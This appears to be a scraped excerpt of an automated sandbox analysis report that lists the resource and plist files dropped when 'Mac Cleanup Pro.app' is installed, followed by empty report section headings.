Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nb.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nb.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nb.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/SUModelTranslation.plist	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/SUStatus.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/Info.plist	Jump to dropped file
Source: /bin/cp (PID: 806)	XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/com.pcv.hlprmcp.plist	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanu

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 7UCvOfE6UM

Overview

General Information

Detection

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

Cryptography:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior: